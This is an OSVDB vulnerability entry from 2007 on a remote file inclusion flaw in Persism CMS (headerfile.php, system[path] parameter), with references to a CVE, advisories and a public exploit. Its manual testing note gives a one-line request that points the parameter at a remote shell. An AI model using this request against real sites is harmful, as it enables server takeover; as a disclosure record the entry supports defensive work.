Persism CMS modules/users/headerfile.php system[path] Variable Remote File Inclusion

2007-05-04T00:00:00
ID OSVDB:37776
Type osvdb
Reporter OSVDB
Modified 2007-05-04T00:00:00

Description

Manual Testing Notes

[Path]/modules/users/headerfile.php?system[path]=shell

References:

Related OSVDB ID: 37775 Related OSVDB ID: 37767 Related OSVDB ID: 37769 Related OSVDB ID: 37770 Related OSVDB ID: 37771 Related OSVDB ID: 37772 Related OSVDB ID: 37768 Related OSVDB ID: 37773 Related OSVDB ID: 37774 ISS X-Force ID: 34102 Generic Exploit URL: http://www.milw0rm.com/exploits/3853 FrSIRT Advisory: ADV-2007-1671 CVE-2007-2545 Bugtraq ID: 23828